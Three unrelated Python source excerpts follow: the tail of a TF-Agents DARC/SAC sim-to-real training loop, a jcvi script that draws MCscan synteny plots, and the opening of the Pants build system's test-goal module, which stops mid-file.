summaries_flush_secs=10,
debug_summaries=True,
summarize_grads_and_vars=False,
train_on_real=False,
delta_r_warmup=0,
random_seed=0,
checkpoint_dir=None,
):
"""A simple train and eval for SAC."""
np.random.seed(random_seed)
tf.random.set_seed(random_seed)
root_dir = os.path.expanduser(root_dir)
train_dir = os.path.join(root_dir, "train")
eval_dir = os.path.join(root_dir, "eval")
train_summary_writer = tf.compat.v2.summary.create_file_writer(
train_dir, flush_millis=summaries_flush_secs * 1000)
train_summary_writer.set_as_default()
eval_summary_writer = tf.compat.v2.summary.create_file_writer(
eval_dir, flush_millis=summaries_flush_secs * 1000)
if environment_name == "broken_reacher":
get_env_fn = darc_envs.get_broken_reacher_env
elif environment_name == "half_cheetah_obstacle":
get_env_fn = darc_envs.get_half_cheetah_direction_env
elif environment_name.startswith("broken_joint"):
base_name = environment_name.split("broken_joint_")[1]
get_env_fn = functools.partial(
darc_envs.get_broken_joint_env, env_name=base_name)
elif environment_name.startswith("falling"):
base_name = environment_name.split("falling_")[1]
get_env_fn = functools.partial(
darc_envs.get_falling_env, env_name=base_name)
else:
raise NotImplementedError("Unknown environment: %s" % environment_name)
eval_name_list = ["sim", "real"]
eval_env_list = [get_env_fn(mode) for mode in eval_name_list]
eval_metrics_list = []
for name in eval_name_list:
eval_metrics_list.append([
tf_metrics.AverageReturnMetric(
buffer_size=num_eval_episodes, name="AverageReturn_%s" % name),
])
global_step = tf.compat.v1.train.get_or_create_global_step()
with tf.compat.v2.summary.record_if(
lambda: tf.math.equal(global_step % summary_interval, 0)):
tf_env_real = get_env_fn("real")
if train_on_real:
tf_env = get_env_fn("real")
else:
tf_env = get_env_fn("sim")
time_step_spec = tf_env.time_step_spec()
observation_spec = time_step_spec.observation
action_spec = tf_env.action_spec()
actor_net = actor_distribution_network.ActorDistributionNetwork(
observation_spec,
action_spec,
fc_layer_params=actor_fc_layers,
continuous_projection_net=(
tanh_normal_projection_network.TanhNormalProjectionNetwork),
)
critic_net = critic_network.CriticNetwork(
(observation_spec, action_spec),
observation_fc_layer_params=critic_obs_fc_layers,
action_fc_layer_params=critic_action_fc_layers,
joint_fc_layer_params=critic_joint_fc_layers,
kernel_initializer="glorot_uniform",
last_kernel_initializer="glorot_uniform",
)
classifier = classifiers.build_classifier(observation_spec, action_spec)
tf_agent = darc_agent.DarcAgent(
time_step_spec,
action_spec,
actor_network=actor_net,
critic_network=critic_net,
classifier=classifier,
actor_optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=actor_learning_rate),
critic_optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=critic_learning_rate),
classifier_optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=classifier_learning_rate),
alpha_optimizer=tf.compat.v1.train.AdamOptimizer(
learning_rate=alpha_learning_rate),
target_update_tau=target_update_tau,
target_update_period=target_update_period,
td_errors_loss_fn=td_errors_loss_fn,
gamma=gamma,
reward_scale_factor=reward_scale_factor,
gradient_clipping=gradient_clipping,
debug_summaries=debug_summaries,
summarize_grads_and_vars=summarize_grads_and_vars,
train_step_counter=global_step,
)
tf_agent.initialize()
# Make the replay buffer.
replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=tf_agent.collect_data_spec,
batch_size=1,
max_length=replay_buffer_capacity,
)
replay_observer = [replay_buffer.add_batch]
real_replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=tf_agent.collect_data_spec,
batch_size=1,
max_length=replay_buffer_capacity,
)
real_replay_observer = [real_replay_buffer.add_batch]
sim_train_metrics = [
tf_metrics.NumberOfEpisodes(name="NumberOfEpisodesSim"),
tf_metrics.EnvironmentSteps(name="EnvironmentStepsSim"),
tf_metrics.AverageReturnMetric(
buffer_size=num_eval_episodes,
batch_size=tf_env.batch_size,
name="AverageReturnSim",
),
tf_metrics.AverageEpisodeLengthMetric(
buffer_size=num_eval_episodes,
batch_size=tf_env.batch_size,
name="AverageEpisodeLengthSim",
),
]
real_train_metrics = [
tf_metrics.NumberOfEpisodes(name="NumberOfEpisodesReal"),
tf_metrics.EnvironmentSteps(name="EnvironmentStepsReal"),
tf_metrics.AverageReturnMetric(
buffer_size=num_eval_episodes,
batch_size=tf_env.batch_size,
name="AverageReturnReal",
),
tf_metrics.AverageEpisodeLengthMetric(
buffer_size=num_eval_episodes,
batch_size=tf_env.batch_size,
name="AverageEpisodeLengthReal",
),
]
eval_policy = greedy_policy.GreedyPolicy(tf_agent.policy)
initial_collect_policy = random_tf_policy.RandomTFPolicy(
tf_env.time_step_spec(), tf_env.action_spec())
collect_policy = tf_agent.collect_policy
train_checkpointer = common.Checkpointer(
ckpt_dir=train_dir,
agent=tf_agent,
global_step=global_step,
metrics=metric_utils.MetricsGroup(
sim_train_metrics + real_train_metrics, "train_metrics"),
)
policy_checkpointer = common.Checkpointer(
ckpt_dir=os.path.join(train_dir, "policy"),
policy=eval_policy,
global_step=global_step,
)
rb_checkpointer = common.Checkpointer(
ckpt_dir=os.path.join(train_dir, "replay_buffer"),
max_to_keep=1,
replay_buffer=(replay_buffer, real_replay_buffer),
)
if checkpoint_dir is not None:
checkpoint_path = tf.train.latest_checkpoint(checkpoint_dir)
assert checkpoint_path is not None
train_checkpointer._load_status = train_checkpointer._checkpoint.restore( # pylint: disable=protected-access
checkpoint_path)
train_checkpointer._load_status.initialize_or_restore() # pylint: disable=protected-access
else:
train_checkpointer.initialize_or_restore()
rb_checkpointer.initialize_or_restore()
if replay_buffer.num_frames() == 0:
initial_collect_driver = dynamic_step_driver.DynamicStepDriver(
tf_env,
initial_collect_policy,
observers=replay_observer + sim_train_metrics,
num_steps=initial_collect_steps,
)
real_initial_collect_driver = dynamic_step_driver.DynamicStepDriver(
tf_env_real,
initial_collect_policy,
observers=real_replay_observer + real_train_metrics,
num_steps=real_initial_collect_steps,
)
collect_driver = dynamic_step_driver.DynamicStepDriver(
tf_env,
collect_policy,
observers=replay_observer + sim_train_metrics,
num_steps=collect_steps_per_iteration,
)
real_collect_driver = dynamic_step_driver.DynamicStepDriver(
tf_env_real,
collect_policy,
observers=real_replay_observer + real_train_metrics,
num_steps=collect_steps_per_iteration,
)
config_str = gin.operative_config_str()
logging.info(config_str)
with tf.compat.v1.gfile.Open(os.path.join(root_dir, "operative.gin"),
"w") as f:
f.write(config_str)
if use_tf_functions:
initial_collect_driver.run = common.function(initial_collect_driver.run)
real_initial_collect_driver.run = common.function(
real_initial_collect_driver.run)
collect_driver.run = common.function(collect_driver.run)
real_collect_driver.run = common.function(real_collect_driver.run)
tf_agent.train = common.function(tf_agent.train)
# Collect initial replay data.
if replay_buffer.num_frames() == 0:
logging.info(
"Initializing replay buffer by collecting experience for %d steps with "
"a random policy.",
initial_collect_steps,
)
initial_collect_driver.run()
real_initial_collect_driver.run()
for eval_name, eval_env, eval_metrics in zip(eval_name_list, eval_env_list,
eval_metrics_list):
metric_utils.eager_compute(
eval_metrics,
eval_env,
eval_policy,
num_episodes=num_eval_episodes,
train_step=global_step,
summary_writer=eval_summary_writer,
summary_prefix="Metrics-%s" % eval_name,
)
metric_utils.log_metrics(eval_metrics)
time_step = None
real_time_step = None
policy_state = collect_policy.get_initial_state(tf_env.batch_size)
timed_at_step = global_step.numpy()
time_acc = 0
# Prepare replay buffer as dataset with invalid transitions filtered.
def _filter_invalid_transition(trajectories, unused_arg1):
return ~trajectories.is_boundary()[0]
dataset = (
replay_buffer.as_dataset(
sample_batch_size=batch_size, num_steps=2).unbatch().filter(
_filter_invalid_transition).batch(batch_size).prefetch(5))
real_dataset = (
real_replay_buffer.as_dataset(
sample_batch_size=batch_size, num_steps=2).unbatch().filter(
_filter_invalid_transition).batch(batch_size).prefetch(5))
# Dataset generates trajectories with shape [Bx2x...]
iterator = iter(dataset)
real_iterator = iter(real_dataset)
def train_step():
experience, _ = next(iterator)
real_experience, _ = next(real_iterator)
return tf_agent.train(experience, real_experience=real_experience)
if use_tf_functions:
train_step = common.function(train_step)
for _ in range(num_iterations):
start_time = time.time()
time_step, policy_state = collect_driver.run(
time_step=time_step,
policy_state=policy_state,
)
assert not policy_state # We expect policy_state == ().
if (global_step.numpy() % real_collect_interval == 0 and
global_step.numpy() >= delta_r_warmup):
real_time_step, policy_state = real_collect_driver.run(
time_step=real_time_step,
policy_state=policy_state,
)
for _ in range(train_steps_per_iteration):
train_loss = train_step()
time_acc += time.time() - start_time
global_step_val = global_step.numpy()
if global_step_val % log_interval == 0:
logging.info("step = %d, loss = %f", global_step_val, train_loss.loss)
steps_per_sec = (global_step_val - timed_at_step) / time_acc
logging.info("%.3f steps/sec", steps_per_sec)
tf.compat.v2.summary.scalar(
name="global_steps_per_sec", data=steps_per_sec, step=global_step)
timed_at_step = global_step_val
time_acc = 0
for train_metric in sim_train_metrics:
train_metric.tf_summaries(
train_step=global_step, step_metrics=sim_train_metrics[:2])
for train_metric in real_train_metrics:
train_metric.tf_summaries(
train_step=global_step, step_metrics=real_train_metrics[:2])
if global_step_val % eval_interval == 0:
for eval_name, eval_env, eval_metrics in zip(eval_name_list,
eval_env_list,
eval_metrics_list):
metric_utils.eager_compute(
eval_metrics,
eval_env,
eval_policy,
num_episodes=num_eval_episodes,
train_step=global_step,
summary_writer=eval_summary_writer,
summary_prefix="Metrics-%s" % eval_name,
)
metric_utils.log_metrics(eval_metrics)
if global_step_val % train_checkpoint_interval == 0:
train_checkpointer.save(global_step=global_step_val)
if global_step_val % policy_checkpoint_interval == 0:
policy_checkpointer.save(global_step=global_step_val)
if global_step_val % rb_checkpoint_interval == 0:
rb_checkpointer.save(global_step=global_step_val)
return train_loss
def main(_):
tf.compat.v1.enable_v2_behavior()
logging.set_verbosity(logging.INFO)
gin.parse_config_files_and_bindings(FLAGS.gin_file, FLAGS.gin_bindings)
train_eval(FLAGS.root_dir)
if __name__ == "__main__":
flags.mark_flag_as_required("root_dir")
app.run(main)
| |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
%prog mcscan.txt all.bed layout.csv
Illustrate MCscan multiple collinearity alignments. Use layout.csv to indicate
the positions of tracks. For example:
#x, y, rotation, ha, va, color, ratio
0.5, 0.6, 0, left, center, g
0.25, 0.7, 45, center, center, m
With the row ordering corresponding to the column ordering in the MCscan output.
For "ha" (horizontal alignment), accepted values are: left|right|leftalign|rightalign|center|""(empty)
For "va" (vertical alignment), accepted values are: top|bottom|center|""(empty)
"""
import sys
import logging
import numpy as np
from typing import Optional
from jcvi.compara.synteny import BlockFile
from jcvi.formats.bed import Bed
from jcvi.formats.base import DictFile
from jcvi.utils.cbook import human_size
from jcvi.utils.validator import validate_in_choices, validate_in_range
from jcvi.apps.base import OptionParser
from jcvi.graphics.glyph import (
BasePalette,
Glyph,
OrientationPalette,
OrthoGroupPalette,
RoundLabel,
)
from jcvi.graphics.base import (
markup,
mpl,
plt,
savefig,
Path,
PathPatch,
AbstractLayout,
)
HorizontalAlignments = ("left", "right", "leftalign", "rightalign", "center", "")
VerticalAlignments = ("top", "bottom", "center", "")
CanvasSize = 0.65
class LayoutLine(object):
def __init__(self, row, delimiter=","):
self.hidden = row[0] == "*"
if self.hidden:
row = row[1:]
args = row.rstrip().split(delimiter)
args = [x.strip() for x in args]
self.x = float(args[0])
validate_in_range(self.x, 0, 1, "XPosition(x) column")
self.y = float(args[1])
validate_in_range(self.y, 0, 1, "YPosition(y) column")
self.rotation = int(args[2])
self.ha = args[3]
validate_in_choices(
self.ha, HorizontalAlignments, "HorizontaAlignment(ha) column"
)
self.va = args[4]
validate_in_choices(self.va, VerticalAlignments, "VerticalAlignment(va) column")
self.color = args[5]
self.ratio = 1
if len(args) > 6:
self.ratio = float(args[6])
if len(args) > 7:
self.label = args[7].strip()
else:
self.label = None
class Layout(AbstractLayout):
def __init__(self, filename, delimiter=","):
super(Layout, self).__init__(filename)
fp = open(filename)
self.edges = []
for row in fp:
if row[0] == "#":
continue
if row[0] == "e":
args = row.rstrip().split(delimiter)
args = [x.strip() for x in args]
a, b = args[1:3]
if len(args) >= 4 and args[3]:
blockcolor = args[3]
else:
blockcolor = None
if len(args) >= 5 and args[4]:
samearc = args[4]
else:
samearc = None
a, b = int(a), int(b)
assert args[0] == "e"
self.edges.append((a, b, blockcolor, samearc))
else:
self.append(LayoutLine(row, delimiter=delimiter))
self.assign_colors()
class Shade(object):
Styles = ("curve", "line")
def __init__(
self,
ax,
a,
b,
ymid,
highlight=False,
style="curve",
ec="k",
fc="k",
alpha=0.2,
lw=1,
zorder=1,
):
"""Create syntenic wedges between tracks.
Args:
ax: matplotlib Axes
a (tuple of floats): ((start_x, start_y), (end_x, end_y))
b (tuple of floats): ((start_x, start_y), (end_x, end_y))
ymid (float): y-mid position for curve style only
highlight (bool, optional): Plot this shade if color is specified. Defaults to False.
style (str, optional): Style. Defaults to "curve", must be one of
("curve", "line")
ec (str, optional): Edge color. Defaults to "k".
fc (str, optional): Face color. Defaults to "k".
alpha (float, optional): Transparency. Defaults to 0.2.
lw (int, optional): Line width. Defaults to 1.
zorder (int, optional): Z-order. Defaults to 1.
"""
fc = fc or "gainsboro" # Default block color is grayish
assert style in self.Styles, "style must be one of {}".format(self.Styles)
a1, a2 = a
b1, b2 = b
ax1, ay1 = a1
ax2, ay2 = a2
bx1, by1 = b1
bx2, by2 = b2
M, C4, L, CP = Path.MOVETO, Path.CURVE4, Path.LINETO, Path.CLOSEPOLY
if style == "curve":
pathdata = [
(M, a1),
(C4, (ax1, ymid)),
(C4, (bx1, ymid)),
(C4, b1),
(L, b2),
(C4, (bx2, ymid)),
(C4, (ax2, ymid)),
(C4, a2),
(CP, a1),
]
else:
pathdata = [(M, a1), (L, b1), (L, b2), (L, a2), (CP, a1)]
codes, verts = zip(*pathdata)
path = Path(verts, codes)
if highlight:
ec = fc = highlight
pp = PathPatch(path, ec=ec, fc=fc, alpha=alpha, lw=lw, zorder=zorder)
ax.add_patch(pp)
class Region(object):
def __init__(
self,
ax,
ext,
layout,
bed,
scale,
switch=None,
chr_label=True,
loc_label=True,
gene_labels: Optional[set] = None,
genelabelsize=0,
pad=0.05,
vpad=0.015,
extra_features=None,
glyphstyle="box",
glyphcolor: BasePalette = OrientationPalette(),
):
x, y = layout.x, layout.y
ratio = layout.ratio
scale /= ratio
self.y = y
lr = layout.rotation
tr = mpl.transforms.Affine2D().rotate_deg_around(x, y, lr) + ax.transAxes
inv = ax.transAxes.inverted()
start, end, si, ei, chr, orientation, span = ext
flank = span / scale / 2
xstart, xend = x - flank, x + flank
self.xstart, self.xend = xstart, xend
cv = lambda t: xstart + abs(t - startbp) / scale
hidden = layout.hidden
# Chromosome
if not hidden:
ax.plot((xstart, xend), (y, y), color="gray", transform=tr, lw=2, zorder=1)
self.genes = genes = bed[si : ei + 1]
startbp, endbp = start.start, end.end
if orientation == "-":
startbp, endbp = endbp, startbp
if switch:
chr = switch.get(chr, chr)
if layout.label:
chr = layout.label
label = "-".join(
(
human_size(startbp, target="Mb", precision=2)[:-2],
human_size(endbp, target="Mb", precision=2),
)
)
height = 0.012
self.gg = {}
# Genes
for g in genes:
gstart, gend = g.start, g.end
strand = g.strand
if strand == "-":
gstart, gend = gend, gstart
if orientation == "-":
strand = "+" if strand == "-" else "-"
x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)
gene_name = g.accn
self.gg[gene_name] = (a, b)
color, zorder = (
glyphcolor.get_color_and_zorder(strand)
if isinstance(glyphcolor, OrientationPalette)
else glyphcolor.get_color_and_zorder(gene_name)
)
if hidden:
continue
gp = Glyph(
ax,
x1,
x2,
y,
height,
gradient=False,
fc=color,
style=glyphstyle,
zorder=zorder,
)
gp.set_transform(tr)
if genelabelsize and (not gene_labels or gene_name in gene_labels):
ax.text(
(x1 + x2) / 2,
y + height / 2 + genelabelsize * vpad / 3,
markup(gene_name),
size=genelabelsize,
rotation=25,
ha="left",
va="center",
color="lightslategray",
)
# Extra features (like repeats)
if extra_features:
for g in extra_features:
gstart, gend = g.start, g.end
x1, x2, a, b = self.get_coordinates(gstart, gend, y, cv, tr, inv)
gp = Glyph(
ax,
x1,
x2,
y,
height * 3 / 4,
gradient=False,
fc="#ff7f00",
style=glyphstyle,
zorder=2,
)
gp.set_transform(tr)
ha, va = layout.ha, layout.va
hpad = 0.02
if ha == "left":
xx = xstart - hpad
ha = "right"
elif ha == "leftalign":
xx = 0.5 - CanvasSize / 2 - hpad
ha = "right"
elif ha == "right":
xx = xend + hpad
ha = "left"
elif ha == "rightalign":
xx = 0.5 + CanvasSize / 2 + hpad
ha = "left"
else:
xx = x
ha = "center"
# Tentative solution to labels stick into glyph
magic = 40.0
cc = abs(lr) / magic if abs(lr) > magic else 1
if va == "top":
yy = y + cc * pad
elif va == "bottom":
yy = y - cc * pad
else:
yy = y
l = np.array((xx, yy))
trans_angle = ax.transAxes.transform_angles(np.array((lr,)), l.reshape((1, 2)))[
0
]
lx, ly = l
if not hidden:
bbox = dict(boxstyle="round", fc="w", ec="w", alpha=0.5)
kwargs = dict(
ha=ha, va="center", rotation=trans_angle, bbox=bbox, zorder=10
)
# TODO: I spent several hours on trying to make this work - with no
# good solutions. To generate labels on multiple lines, each line
# with a different style is difficult in matplotlib. The only way,
# if you can tolerate an extra dot (.), is to use the recipe below.
# chr_label = r"\noindent " + markup(chr) + r" \\ ." if chr_label else None
# loc_label = r"\noindent . \\ " + label if loc_label else None
chr_label = markup(chr) if chr_label else None
loc_label = label if loc_label else None
if chr_label:
if loc_label:
ax.text(lx, ly + vpad, chr_label, color=layout.color, **kwargs)
ax.text(
lx,
ly - vpad,
loc_label,
color="lightslategrey",
size=10,
**kwargs,
)
else:
ax.text(lx, ly, chr_label, color=layout.color, **kwargs)
def get_coordinates(self, gstart, gend, y, cv, tr, inv):
x1, x2 = cv(gstart), cv(gend)
a, b = tr.transform((x1, y)), tr.transform((x2, y))
a, b = inv.transform(a), inv.transform(b)
return x1, x2, a, b
class Synteny(object):
def __init__(
self,
fig,
root,
datafile,
bedfile,
layoutfile,
switch=None,
tree=None,
extra_features=None,
chr_label=True,
loc_label=True,
gene_labels: Optional[set] = None,
genelabelsize=0,
pad=0.05,
vpad=0.015,
scalebar=False,
shadestyle="curve",
glyphstyle="arrow",
glyphcolor: BasePalette = OrientationPalette(),
):
_, h = fig.get_figwidth(), fig.get_figheight()
bed = Bed(bedfile)
order = bed.order
bf = BlockFile(datafile)
self.layout = lo = Layout(layoutfile)
switch = DictFile(switch, delimiter="\t") if switch else None
if extra_features:
extra_features = Bed(extra_features)
exts = []
extras = []
for i in range(bf.ncols):
ext = bf.get_extent(i, order)
exts.append(ext)
if extra_features:
start, end, si, ei, chr, orientation, span = ext
start, end = start.start, end.end # start, end coordinates
ef = list(extra_features.extract(chr, start, end))
# Pruning removes minor features with < 0.1% of the region
ef_pruned = [x for x in ef if x.span >= span / 1000]
print(
"Extracted {0} features "
"({1} after pruning)".format(len(ef), len(ef_pruned)),
file=sys.stderr,
)
extras.append(ef_pruned)
maxspan = max(exts, key=lambda x: x[-1])[-1]
scale = maxspan / CanvasSize
self.gg = gg = {}
self.rr = []
ymids = []
glyphcolor = (
OrientationPalette()
if glyphcolor == "orientation"
else OrthoGroupPalette(bf.grouper())
)
for i in range(bf.ncols):
ext = exts[i]
ef = extras[i] if extras else None
r = Region(
root,
ext,
lo[i],
bed,
scale,
switch,
gene_labels=gene_labels,
genelabelsize=genelabelsize,
chr_label=chr_label,
loc_label=loc_label,
vpad=vpad,
extra_features=ef,
glyphstyle=glyphstyle,
glyphcolor=glyphcolor,
)
self.rr.append(r)
# Use tid and accn to store gene positions
gg.update(dict(((i, k), v) for k, v in r.gg.items()))
ymids.append(r.y)
def offset(samearc):
if samearc == "above":
return 2 * pad
if samearc == "above2":
return 4 * pad
if samearc == "below":
return -2 * pad
if samearc == "below2":
return -4 * pad
for i, j, blockcolor, samearc in lo.edges:
for ga, gb, h in bf.iter_pairs(i, j):
a, b = gg[(i, ga)], gg[(j, gb)]
if samearc is not None:
ymid = ymids[i] + offset(samearc)
else:
ymid = (ymids[i] + ymids[j]) / 2
Shade(root, a, b, ymid, fc=blockcolor, lw=0, alpha=1, style=shadestyle)
for ga, gb, h in bf.iter_pairs(i, j, highlight=True):
a, b = gg[(i, ga)], gg[(j, gb)]
if samearc is not None:
ymid = ymids[i] + offset(samearc)
else:
ymid = (ymids[i] + ymids[j]) / 2
Shade(
root, a, b, ymid, alpha=1, highlight=h, zorder=2, style=shadestyle
)
if scalebar:
print("Build scalebar (scale={})".format(scale), file=sys.stderr)
# Find the best length of the scalebar
ar = [1, 2, 5]
candidates = (
[1000 * x for x in ar]
+ [10000 * x for x in ar]
+ [100000 * x for x in ar]
)
# Find the one that's close to an optimal canvas size
dists = [(abs(x / scale - 0.12), x) for x in candidates]
dist, candidate = min(dists)
dist = candidate / scale
x, y, yp = 0.22, 0.92, 0.005
a, b = x - dist / 2, x + dist / 2
lsg = "lightslategrey"
root.plot([a, a], [y - yp, y + yp], "-", lw=2, color=lsg)
root.plot([b, b], [y - yp, y + yp], "-", lw=2, color=lsg)
root.plot([a, b], [y, y], "-", lw=2, color=lsg)
root.text(
x,
y + 0.02,
human_size(candidate, precision=0),
ha="center",
va="center",
)
if tree:
from jcvi.graphics.tree import draw_tree, read_trees
trees = read_trees(tree)
ntrees = len(trees)
logging.debug("A total of {0} trees imported.".format(ntrees))
xiv = 1.0 / ntrees
yiv = 0.3
xstart = 0
ystart = min(ymids) - 0.4
for i in range(ntrees):
ax = fig.add_axes([xstart, ystart, xiv, yiv])
label, outgroup, color, tx = trees[i]
draw_tree(
ax,
tx,
outgroup=outgroup,
rmargin=0.4,
leaffont=11,
treecolor=color,
supportcolor=color,
leafcolor=color,
)
xstart += xiv
RoundLabel(ax, 0.5, 0.3, label, fill=True, fc="lavender", color=color)
def draw_gene_legend(
ax,
x1,
x2,
ytop,
d=0.04,
text=False,
repeat=False,
glyphstyle="box",
):
forward, backward = OrientationPalette.forward, OrientationPalette.backward
ax.plot([x1, x1 + d], [ytop, ytop], ":", color=forward, lw=2)
ax.plot([x1 + d], [ytop], ">", color=forward, mec=forward)
ax.plot([x2, x2 + d], [ytop, ytop], ":", color=backward, lw=2)
ax.plot([x2], [ytop], "<", color=backward, mec="g")
if text:
ax.text(x1 + d / 2, ytop + d / 2, "gene (+)", ha="center")
ax.text(x2 + d / 2, ytop + d / 2, "gene (-)", ha="center")
if repeat:
xr = (x1 + x2 + d) / 2
Glyph(
ax,
xr - d / 2,
xr + d / 2,
ytop,
0.012 * 3 / 4,
gradient=False,
fc="#ff7f00",
style=glyphstyle,
zorder=2,
)
ax.text(xr, ytop + d / 2, "repeat", ha="center")
def main():
p = OptionParser(__doc__)
p.add_option("--switch", help="Rename the seqid with two-column file")
p.add_option("--tree", help="Display trees on the bottom of the figure")
p.add_option("--extra", help="Extra features in BED format")
p.add_option(
"--genelabels",
help='Show only these gene labels, separated by comma. Example: "At1g12340,At5g54690"',
)
p.add_option(
"--genelabelsize",
default=0,
type="int",
help="Show gene labels at this font size, useful for debugging. "
+ "However, plot may appear visually crowded. "
+ "Reasonably good values are 2 to 6 [Default: disabled]",
)
p.add_option(
"--scalebar",
default=False,
action="store_true",
help="Add scale bar to the plot",
)
p.add_option(
"--glyphstyle",
default="box",
choices=Glyph.Styles,
help="Style of feature glyphs",
)
p.add_option(
"--glyphcolor",
default="orientation",
choices=Glyph.Palette,
help="Glyph coloring based on",
)
p.add_option(
"--shadestyle",
default="curve",
choices=Shade.Styles,
help="Style of syntenic wedges",
)
opts, args, iopts = p.set_image_options(figsize="8x7")
if len(args) != 3:
sys.exit(not p.print_help())
datafile, bedfile, layoutfile = args
switch = opts.switch
tree = opts.tree
gene_labels = None if not opts.genelabels else set(opts.genelabels.split(","))
pf = datafile.rsplit(".", 1)[0]
fig = plt.figure(1, (iopts.w, iopts.h))
root = fig.add_axes([0, 0, 1, 1])
Synteny(
fig,
root,
datafile,
bedfile,
layoutfile,
switch=switch,
tree=tree,
extra_features=opts.extra,
gene_labels=gene_labels,
genelabelsize=opts.genelabelsize,
scalebar=opts.scalebar,
shadestyle=opts.shadestyle,
glyphstyle=opts.glyphstyle,
glyphcolor=opts.glyphcolor,
)
root.set_xlim(0, 1)
root.set_ylim(0, 1)
root.set_axis_off()
image_name = pf + "." + iopts.format
savefig(image_name, dpi=iopts.dpi, iopts=iopts)
if __name__ == "__main__":
main()
| |
# Copyright 2018 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import itertools
import logging
from abc import ABC, ABCMeta
from dataclasses import dataclass
from enum import Enum
from pathlib import PurePath
from typing import Any, ClassVar, TypeVar, cast
from pants.core.goals.package import BuiltPackage, PackageFieldSet
from pants.core.util_rules.distdir import DistDir
from pants.engine.addresses import Address, UnparsedAddressInputs
from pants.engine.collection import Collection
from pants.engine.console import Console
from pants.engine.desktop import OpenFiles, OpenFilesRequest
from pants.engine.engine_aware import EngineAwareReturnType
from pants.engine.environment import Environment, EnvironmentRequest
from pants.engine.fs import EMPTY_FILE_DIGEST, Digest, FileDigest, MergeDigests, Snapshot, Workspace
from pants.engine.goal import Goal, GoalSubsystem
from pants.engine.internals.session import RunId
from pants.engine.process import (
FallibleProcessResult,
InteractiveProcess,
InteractiveProcessResult,
ProcessResultMetadata,
)
from pants.engine.rules import Effect, Get, MultiGet, collect_rules, goal_rule, rule
from pants.engine.target import (
FieldSet,
FieldSetsPerTarget,
FieldSetsPerTargetRequest,
NoApplicableTargetsBehavior,
SourcesField,
SpecialCasedDependencies,
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest,
Targets,
)
from pants.engine.unions import UnionMembership, union
from pants.option.option_types import BoolOption, EnumOption, StrListOption, StrOption
from pants.util.docutil import bin_name
from pants.util.logging import LogLevel
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class TestResult(EngineAwareReturnType):
exit_code: int | None
stdout: str
stdout_digest: FileDigest
stderr: str
stderr_digest: FileDigest
address: Address
output_setting: ShowOutput
result_metadata: ProcessResultMetadata | None
coverage_data: CoverageData | None = None
xml_results: Snapshot | None = None
# Any extra output (such as from plugins) that the test runner was configured to output.
extra_output: Snapshot | None = None
# Prevent this class from being detected by pytest as a test class.
__test__ = False
@classmethod
def skip(cls, address: Address, output_setting: ShowOutput) -> TestResult:
return cls(
exit_code=None,
stdout="",
stderr="",
stdout_digest=EMPTY_FILE_DIGEST,
stderr_digest=EMPTY_FILE_DIGEST,
address=address,
output_setting=output_setting,
result_metadata=None,
)
@classmethod
def from_fallible_process_result(
cls,
process_result: FallibleProcessResult,
address: Address,
output_setting: ShowOutput,
*,
coverage_data: CoverageData | None = None,
xml_results: Snapshot | None = None,
extra_output: Snapshot | None = None,
) -> TestResult:
return cls(
exit_code=process_result.exit_code,
stdout=process_result.stdout.decode(),
stdout_digest=process_result.stdout_digest,
stderr=process_result.stderr.decode(),
stderr_digest=process_result.stderr_digest,
address=address,
output_setting=output_setting,
result_metadata=process_result.metadata,
coverage_data=coverage_data,
xml_results=xml_results,
extra_output=extra_output,
)
@property
def skipped(self) -> bool:
return self.exit_code is None or self.result_metadata is None
def __lt__(self, other: Any) -> bool:
"""We sort first by status (skipped vs failed vs succeeded), then alphanumerically within
each group."""
if not isinstance(other, TestResult):
return NotImplemented
if self.exit_code == other.exit_code:
return self.address.spec < other.address.spec
if self.skipped or self.exit_code is None:
return True
if other.skipped or other.exit_code is None:
return False
return abs(self.exit_code) < abs(other.exit_code)
def artifacts(self) -> dict[str, FileDigest | Snapshot] | None:
output: dict[str, FileDigest | Snapshot] = {
"stdout": self.stdout_digest,
"stderr": self.stderr_digest,
}
if self.xml_results:
output["xml_results"] = self.xml_results
return output
def level(self) -> LogLevel:
if self.skipped:
return LogLevel.DEBUG
return LogLevel.INFO if self.exit_code == 0 else LogLevel.ERROR
def message(self) -> str:
if self.skipped:
return f"{self.address} skipped."
status = "succeeded" if self.exit_code == 0 else f"failed (exit code {self.exit_code})"
message = f"{self.address} {status}."
if self.output_setting == ShowOutput.NONE or (
self.output_setting == ShowOutput.FAILED and self.exit_code == 0
):
return message
output = ""
if self.stdout:
output += f"\n{self.stdout}"
if self.stderr:
output += f"\n{self.stderr}"
if output:
output = f"{output.rstrip()}\n\n"
return f"{message}{output}"
def metadata(self) -> dict[str, Any]:
return {"address": self.address.spec}
def cacheable(self) -> bool:
"""Is marked uncacheable to ensure that it always renders."""
return False
class ShowOutput(Enum):
"""Which tests to emit detailed output for."""
ALL = "all"
FAILED = "failed"
NONE = "none"
@dataclass(frozen=True)
class TestDebugRequest:
process: InteractiveProcess | None
# Prevent this class from being detected by pytest as a test class.
__test__ = False
@union
@dataclass(frozen=True)
class TestFieldSet(FieldSet, metaclass=ABCMeta):
"""The fields necessary to run tests on a target."""
sources: SourcesField
__test__ = False
class CoverageData(ABC):
"""Base class for inputs to a coverage report.
Subclasses should add whichever fields they require - snapshots of coverage output, XML files,
etc.
"""
_CD = TypeVar("_CD", bound=CoverageData)
@union
class CoverageDataCollection(Collection[_CD]):
element_type: ClassVar[type[_CD]]
@dataclass(frozen=True)
class CoverageReport(ABC):
"""Represents a code coverage report that can be materialized to the terminal or disk."""
# Some coverage systems can determine, based on a configurable threshold, whether coverage
# was sufficient or not. The test goal will fail the build if coverage was deemed insufficient.
coverage_insufficient: bool
def materialize(self, console: Console, workspace: Workspace) -> PurePath | None:
"""Materialize this code coverage report to the terminal or disk.
:param console: A handle to the terminal.
:param workspace: A handle to local disk.
:return: If a report was materialized to disk, the path of the file in the report one might
open first to start examining the report.
"""
...
def get_artifact(self) -> tuple[str, Snapshot] | None:
return None
@dataclass(frozen=True)
